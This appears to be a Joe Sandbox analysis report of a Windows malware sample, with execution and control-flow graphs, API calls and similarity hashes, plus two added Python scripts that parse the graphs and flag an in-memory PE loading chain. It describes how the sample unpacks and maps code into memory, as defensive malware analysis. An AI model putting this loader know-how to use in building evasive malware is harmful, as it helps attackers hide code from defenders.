execution_graph 26276 8c9ece 26277 8c9edd 26276->26277 26280 8ca66e 26277->26280 26283 8ca689 26280->26283 26281 8ca692 CreateToolhelp32Snapshot 26282 8ca6ae Module32First 26281->26282 26281->26283 26284 8ca6bd 26282->26284 26285 8c9ee6 26282->26285 26283->26281 26283->26282 26287 8ca32d 26284->26287 26288 8ca358 26287->26288 26289 8ca369 VirtualAlloc 26290 8ca3a1 26288->26289 26288->26290 26289->26290 26290->26290 26291 43cd60 26292 43cd80 26291->26292 26292->26292 26295 43cdbe 26292->26295 26297 43a9b0 LdrInitializeThunk 26292->26297 26293 43ce3e 26295->26293 26298 43a9b0 LdrInitializeThunk 26295->26298 26297->26295 26298->26293 26309 43b068 26310 43b080 26309->26310 26313 43b16e 26310->26313 26315 43a9b0 LdrInitializeThunk 26310->26315 26312 43b23f 26312->26312 26313->26312 26316 43a9b0 LdrInitializeThunk 26313->26316 26315->26313 26316->26312 26317 40b44c 26318 40b57c 26317->26318 26319 40b45a 26317->26319 26319->26318 26319->26319 26322 40b65c 26319->26322 26323 43a950 26319->26323 26321 43a950 2 API calls 26321->26318 26322->26321 26324 43a976 26323->26324 26325 43a995 26323->26325 26326 43a968 26323->26326 26329 43a98a 26323->26329 26328 43a97b RtlReAllocateHeap 26324->26328 26330 438e70 26325->26330 26326->26324 26326->26325 26328->26329 26329->26322 26331 438e83 26330->26331 26332 438e94 26330->26332 26333 438e88 RtlFreeHeap 26331->26333 26332->26329 26333->26332 26334 43aecc 26336 43af00 26334->26336 26335 43af7e 26336->26335 26338 43a9b0 LdrInitializeThunk 26336->26338 26338->26335 26339 408790 26341 40879f 26339->26341 26340 408970 ExitProcess 26341->26340 26342 4087b4 GetCurrentProcessId GetCurrentThreadId 26341->26342 26345 40887a 26341->26345 26343 4087da 26342->26343 26344 4087de SHGetSpecialFolderPathW GetForegroundWindow 26342->26344 26343->26344 26344->26345 26345->26340 26346 438e51 RtlAllocateHeap 26347 43ab91 26348 43ab9a GetForegroundWindow 26347->26348 26349 43abad 26348->26349 26350 249003c 26351 2490049 26350->26351 26365 2490e0f SetErrorMode SetErrorMode 26351->26365 26356 2490265 26357 24902ce VirtualProtect 26356->26357 26359 249030b 26357->26359 26358 2490439 VirtualFree 26363 24905f4 LoadLibraryA 26358->26363 26364 24904be 26358->26364 26359->26358 26360 24904e3 LoadLibraryA 26360->26364 26362 24908c7 26363->26362 26364->26360 26364->26363 26366 2490223 26365->26366 26367 2490d90 26366->26367 26368 2490dad 26367->26368 26369 2490dbb GetPEB 26368->26369 26370 2490238 VirtualAlloc 26368->26370 26369->26370 26370->26356
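The execution graph above is a flat token stream: a node is a numeric id followed by its hex address and any API names the block calls, and each id->id token is a directed edge. Read that way, the only cluster in which a directed path runs VirtualAlloc -> VirtualProtect -> VirtualFree -> LoadLibraryA is the one starting at 0x249003c (entered after two SetErrorMode calls and a GetPEB read), which is the call order of a loader that maps a PE image into fresh memory, fixes up section protections, releases its packed input and then resolves imports; the VirtualAlloc at 0x8ca369 in the Toolhelp cluster has no such continuation. The script below is an added example and is not part of the Joe Sandbox report or its tooling: it parses a constructed excerpt of this report's graph (four of its clusters, copied from the line above) into nodes, edges and components, and flags that chain. The token grammar is inferred from the page (the label "2 API calls" shows that a label may start with a decimal token, so a token counts as a node id only when the next token is a hex address); the function names and the manual-map heuristic are the example's own.

```python
"""Parse a Joe Sandbox execution_graph dump and flag the in-memory PE loading
chain VirtualAlloc -> VirtualProtect -> LoadLibraryA behind this report's
"Detected unpacking" signatures. Added example, not Joe Sandbox code: the dump
grammar ("<id> <hexaddr> [label ...]" is a node, "<id>-><id>" an edge) is
inferred from the page, where "2 API calls" shows a label may start with a digit."""
import re
from collections import deque

# Constructed excerpt of this report's execution_graph line (four of its clusters).
GRAPH_DUMP = (
    "execution_graph 26276 8c9ece 26277 8c9edd 26276->26277 26280 8ca66e 26277->26280 26283 8ca689 "
    "26280->26283 26281 8ca692 CreateToolhelp32Snapshot 26282 8ca6ae Module32First 26281->26282 "
    "26281->26283 26284 8ca6bd 26282->26284 26285 8c9ee6 26282->26285 26283->26281 26283->26282 "
    "26287 8ca32d 26284->26287 26288 8ca358 26287->26288 26289 8ca369 VirtualAlloc 26290 8ca3a1 "
    "26288->26289 26288->26290 26289->26290 26290->26290 "
    "26317 40b44c 26318 40b57c 26317->26318 26319 40b45a 26317->26319 26319->26318 26319->26319 "
    "26322 40b65c 26319->26322 26323 43a950 26319->26323 26321 43a950 2 API calls 26321->26318 "
    "26322->26321 "
    "26339 408790 26341 40879f 26339->26341 26340 408970 ExitProcess 26341->26340 26342 4087b4 "
    "GetCurrentProcessId GetCurrentThreadId 26341->26342 26345 40887a 26341->26345 26343 4087da "
    "26342->26343 26344 4087de SHGetSpecialFolderPathW GetForegroundWindow 26342->26344 26343->26344 "
    "26344->26345 26345->26340 "
    "26350 249003c 26351 2490049 26350->26351 26365 2490e0f SetErrorMode SetErrorMode 26351->26365 "
    "26356 2490265 26357 24902ce VirtualProtect 26356->26357 26359 249030b 26357->26359 26358 2490439 "
    "VirtualFree 26363 24905f4 LoadLibraryA 26358->26363 26364 24904be 26358->26364 26359->26358 "
    "26360 24904e3 LoadLibraryA 26360->26364 26362 24908c7 26363->26362 26364->26360 26364->26363 "
    "26366 2490223 26365->26366 26367 2490d90 26366->26367 26368 2490dad 26367->26368 26369 2490dbb "
    "GetPEB 26368->26369 26370 2490238 VirtualAlloc 26368->26370 26369->26370 26370->26356"
)
HEX_ADDR = re.compile(r"^[0-9a-f]{4,8}$")
API_NAME = re.compile(r"^[A-Z][A-Za-z0-9]{3,}$")  # export-style name; any other label is a note


def parse_graph(dump):
    """Return ({id: {"addr": int, "apis": [...], "notes": [...]}}, [(src, dst), ...])."""
    tokens = dump.replace("execution_graph", "").split()
    nodes, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:  # edge between two node ids
            src, dst = tok.split("->", 1)
            edges.append((int(src), int(dst)))
        elif tok.isdigit() and i + 1 < len(tokens) and HEX_ADDR.match(tokens[i + 1]):
            cur = int(tok)  # node id, consumed together with its address
            nodes[cur] = {"addr": int(tokens[i + 1], 16), "apis": [], "notes": []}
            i += 1
        else:  # label belonging to the most recently defined node
            nodes[cur]["apis" if API_NAME.match(tok) else "notes"].append(tok)
        i += 1
    return nodes, edges


def _neighbors(edges, directed):
    adj = {}
    for s, d in edges:
        adj.setdefault(s, set()).add(d)
        adj.setdefault(d, set()).update(() if directed else (s,))
    return adj


def _bfs(start, adj):
    """Node ids reachable from start (start included)."""
    seen, queue = {start}, deque([start])
    while queue:
        for m in adj.get(queue.popleft(), ()):
            if m not in seen:
                seen.add(m)
                queue.append(m)
    return seen


def components(nodes, edges):
    """Weakly connected components; in the report each is one function's call tree."""
    adj = _neighbors(edges, directed=False)
    for n in nodes:
        adj.setdefault(n, set())
    comps, seen = [], set()
    for start in sorted(adj):
        if start not in seen:
            comps.append(_bfs(start, adj))
            seen |= comps[-1]
    return comps


def find_manual_map_chains(nodes, edges):
    """Directed VirtualAlloc -> VirtualProtect -> LoadLibraryA paths as address triples.
    A lone VirtualAlloc, like 0x8ca369 in the Toolhelp cluster, is not reported."""
    out = _neighbors(edges, directed=True)

    def nodes_for(api):
        return [n for n, v in nodes.items() if api in v["apis"]]

    chains = set()
    for a in nodes_for("VirtualAlloc"):
        from_a = _bfs(a, out)
        for p in nodes_for("VirtualProtect"):
            if p != a and p in from_a:
                from_p = _bfs(p, out)
                for l in nodes_for("LoadLibraryA"):
                    if l != p and l in from_p:
                        chains.add(tuple(nodes[n]["addr"] for n in (a, p, l)))
    return sorted(chains)


def summarize(nodes, edges):
    """One (lowest address, sorted distinct API names) pair per component."""
    rows = []
    for comp in components(nodes, edges):
        known = [n for n in comp if n in nodes]
        apis = {a for n in known for a in nodes[n]["apis"]}
        rows.append((min(nodes[n]["addr"] for n in known), sorted(apis)))
    return sorted(rows)


if __name__ == "__main__":
    g_nodes, g_edges = parse_graph(GRAPH_DUMP)
    for lo, apis in summarize(g_nodes, g_edges):
        print("cluster @ 0x%x: %s" % (lo, ", ".join(apis) or "(no API calls)"))
    for a, p, l in find_manual_map_chains(g_nodes, g_edges):
        print("manual-map chain: VirtualAlloc 0x%x -> VirtualProtect 0x%x -> LoadLibraryA 0x%x" % (a, p, l))
```

Run stand-alone it prints one line per cluster with the distinct APIs it calls, then the single flagged chain, reported twice because two LoadLibraryA sites (0x24904e3 and 0x24905f4) are reachable from the VirtualProtect at 0x24902ce. The same parser works on the full line above; only the constructed excerpt is embedded so the block runs offline.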

Control-flow Graph

APIs
• GetCurrentProcessId.KERNEL32 ref: 004087B4
• GetCurrentThreadId.KERNEL32 ref: 004087BE
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
• GetForegroundWindow.USER32 ref: 00408870
• ExitProcess.KERNEL32 ref: 00408972
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID:
• API String ID: 4063528623-0
• Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
• Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5

Control-flow Graph

• Graph image omitted; the function consists of a single block, 43a9b0-43a9e2, which calls LdrInitializeThunk.
APIs
• LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
• Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: ihgf
• API String ID: 2994545307-2948842496
• Opcode ID: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
• Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
• Opcode Fuzzy Hash: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
• Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
• Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
• Opcode Fuzzy Hash: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
• Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD

Control-flow Graph

• Graph image omitted; the function starts at 249003c and its blocks call VirtualAlloc, VirtualProtect, VirtualFree and LoadLibraryA (LoadLibraryA at two sites).
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0249024D
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: 399dcb6eb3918c0fda0455d7dbc85658349493339161d9849fa38a55beedf806
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: D2525874A01229DFDB64CF58C984BA9BBB1BF09314F1480DAE94DAB351DB30AE95CF14

Control-flow Graph

• Graph image omitted; the function starts at 43ab0b and its block 43ab7d-43abce calls GetForegroundWindow.
APIs
• GetForegroundWindow.USER32 ref: 0043AB9F
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID: ForegroundWindow
• String ID: ilmn
• API String ID: 2020703349-1560153188
• Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
• Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
• Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
• Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286

Control-flow Graph

• Graph image omitted; the function starts at 8ca66e and its blocks call CreateToolhelp32Snapshot (block 8ca692-8ca69e) and Module32First (block 8ca6ae-8ca6bb).
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008CA696
                                                                                                                                                                                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 008CA6B6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433571436.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, Offset: 008C9000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8c9000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                    • Instruction ID: 0a8b1b7dc1138120948f04ff3d988b12f929e21423baebd51c9ed8e9792178d7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFF062321007186BD7242AF9988DF6A76F8FF59768F14452CE646D14C0DB70EC454A62

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 142 2490e0f-2490e24 SetErrorMode * 2 143 2490e2b-2490e2c 142->143 144 2490e26 142->144 144->143
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00000400,?,?,02490223,?,?), ref: 02490E19
                                                                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00000000,?,?,02490223,?,?), ref: 02490E1E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                    • Instruction ID: 222b95ba1efed397dc51e845e48fe434b558f4b478ecd050a5280b6dec76a593
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20D0123514512877DB002A94DC09BCE7F1CDF05B66F008011FB0DD9180C770954046E5

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 238 43a950-43a961 239 43a976-43a988 call 43bf00 RtlReAllocateHeap 238->239 240 43a995-43a996 call 438e70 238->240 241 43a98a-43a993 call 438e30 238->241 242 43a968-43a96f 238->242 249 43a9a0-43a9a2 239->249 248 43a99b-43a99e 240->248 241->249 242->239 242->240 248->249
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                                    • Instruction ID: 722538be6ec62bdfb2320af1aff19aeee9eb7e72755357ed04131fae2c05cc9a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99E0E576414611FBC6001B24BC06B1B3665AF8A721F02183AF440E6115DA38E811859F

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 250 43ab91-43aba8 GetForegroundWindow call 43c7d0 253 43abad-43abce 250->253
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2020703349-0
                                                                                                                                                                                                                                                                    • Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                                    • Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 255 438e70-438e7c 256 438e83-438e8e call 43bf00 RtlFreeHeap 255->256 257 438e94-438e95 255->257 256->257
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                    • Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                                    • Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8

Control-flow Graph
• Block 260: 438e47-438e4a
• Block 261: 438e51-438e55, calls RtlAllocateHeap
• Edge: 260 -> 261
APIs
• RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
• Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
• Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
• Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E
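The control-flow graph of this function survives in the report only as one text line of the graph widget: block id, start-end address range, the API called from the block, then the edges as "a->b". Pulling those lines out of many functions by hand is tedious, so here is a small parser for that line format. This is an added example, not code from the Joe Sandbox report or from its IDA plugin: the token layout and the inclusive block ranges are inferred from the single line shown above and are assumptions, and the names SAMPLE_CFG, parse_cfg, block_containing, check_api_ref and to_dot are mine. It rebuilds the blocks and edges, emits Graphviz DOT, and cross-checks the "ref:" address from the APIs list against the block that names the API.

```python
"""Parse a Joe Sandbox control_flow_graph text line into blocks and edges.

Added example; not part of the Joe Sandbox report. The token layout
(node id, start-end address range, optional API names, then a->b edges)
is inferred from the single line shown on this page and is an assumption.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: the graph line for the RtlAllocateHeap function at
# 0x438E47 as printed in the report, plus the "ref:" address the report
# lists for the same call in its APIs section.
SAMPLE_CFG = ("control_flow_graph 260 438e47-438e4a "
              "261 438e51-438e55 RtlAllocateHeap 260->261")
SAMPLE_API_REF = ("RtlAllocateHeap", 0x00438E55)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
RANGE_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)$", re.IGNORECASE)


@dataclass
class Block:
    node_id: int
    start: int            # address of the first instruction
    end: int              # address of the last instruction (inclusive, assumed)
    apis: List[str] = field(default_factory=list)


@dataclass
class Cfg:
    blocks: Dict[int, Block]
    edges: List[Tuple[int, int]]


def parse_cfg(line: str) -> Cfg:
    """Tokenise one control_flow_graph line; raise ValueError on malformed input."""
    tokens = line.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    current: Optional[Block] = None
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            current = None            # edges come after the block list
            i += 1
            continue
        rng = RANGE_RE.match(tokens[i + 1]) if i + 1 < len(tokens) else None
        if tok.isdigit() and rng:
            current = Block(int(tok), int(rng.group(1), 16), int(rng.group(2), 16))
            if current.start > current.end:
                raise ValueError(f"block {tok}: start above end")
            blocks[current.node_id] = current
            i += 2
            continue
        if current is None:
            raise ValueError(f"unexpected token {tok!r}")
        current.apis.append(tok)      # API name attached to the current block
        i += 1
    for a, b in edges:                # every edge must join two known blocks
        if a not in blocks or b not in blocks:
            raise ValueError(f"edge {a}->{b} references an unknown block")
    return Cfg(blocks, edges)


def block_containing(cfg: Cfg, addr: int) -> Optional[int]:
    """Return the id of the block whose range covers addr, or None."""
    for b in cfg.blocks.values():
        if b.start <= addr <= b.end:
            return b.node_id
    return None


def check_api_ref(cfg: Cfg, api: str, ref: int) -> bool:
    """True if the report's 'ref:' address for api falls in the block that names api."""
    node = block_containing(cfg, ref)
    return node is not None and api in cfg.blocks[node].apis


def to_dot(cfg: Cfg) -> str:
    """Render the graph as Graphviz DOT (pipe into: dot -Tpng)."""
    out = ["digraph cfg {", "  node [shape=box fontname=monospace];"]
    for b in cfg.blocks.values():
        label = f"{b.node_id}: {b.start:08x}-{b.end:08x}"
        if b.apis:
            label += "\\n" + ", ".join(b.apis)
        out.append(f'  n{b.node_id} [label="{label}"];')
    out.extend(f"  n{a} -> n{b};" for a, b in cfg.edges)
    out.append("}")
    return "\n".join(out)


if __name__ == "__main__":
    g = parse_cfg(SAMPLE_CFG)
    print(to_dot(g))
    print("api ref consistent:", check_api_ref(g, *SAMPLE_API_REF))
```

For the line above, the ref address 00438E55 lands inside block 261, the block that names RtlAllocateHeap, so the two sections of the report agree; a mismatch would usually mean the snapshot the graph was built from differs from the one the API list was taken from.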
APIs
• RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
• Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
• Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
• Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008CA37E
